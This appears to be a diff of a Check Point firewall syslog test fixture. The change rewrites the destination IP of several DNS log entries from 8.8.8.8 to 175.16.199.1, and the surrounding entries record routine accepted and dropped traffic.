+<134>1 2020-03-29T19:37:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f90f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510671"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50500"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:38:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f919,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510681"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52110"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:38:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f919,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510681"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43120"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T19:38:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f93d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51196"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T19:38:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f93d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51197"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T19:38:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f93e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
@@ -4801,12 +4801,12 @@
 <134>1 2020-03-29T20:09:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810079,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51464"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T20:09:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81007a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51465"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T20:09:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81007a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51466"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T20:09:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810088,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47275"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T20:09:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810088,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47275"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T20:09:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81008a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:09:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e81008a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50561"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T20:09:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e81008a,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585512586"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T20:09:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e81008a,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585512586"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T20:09:52Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810092,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
-<134>1 2020-03-29T20:09:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810092,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585512594"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46959"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T20:09:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810092,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585512594"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46959"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T20:09:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810092,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"62180"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:09:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810092,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"63328"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:09:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810092,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48786"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10389"; xlatesrc:"0.0.0.0"]
@@ -4817,7 +4817,7 @@
 <134>1 2020-03-29T20:09:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810092,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55482"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10392"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T20:09:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810092,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35228"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:09:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810092,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35403"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10393"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T20:09:56Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810094,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585512596"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37130"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T20:09:56Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810094,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585512596"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37130"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T20:09:56Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810094,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38557"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:09:56Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810094,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41637"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:09:56Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810094,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48800"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10394"; xlatesrc:"0.0.0.0"]
@@ -4985,10 +4985,10 @@
 <134>1 2020-03-29T20:17:56Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810274,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"137"; service:"137"; service_id:"nbname"; src:"192.168.1.1"]
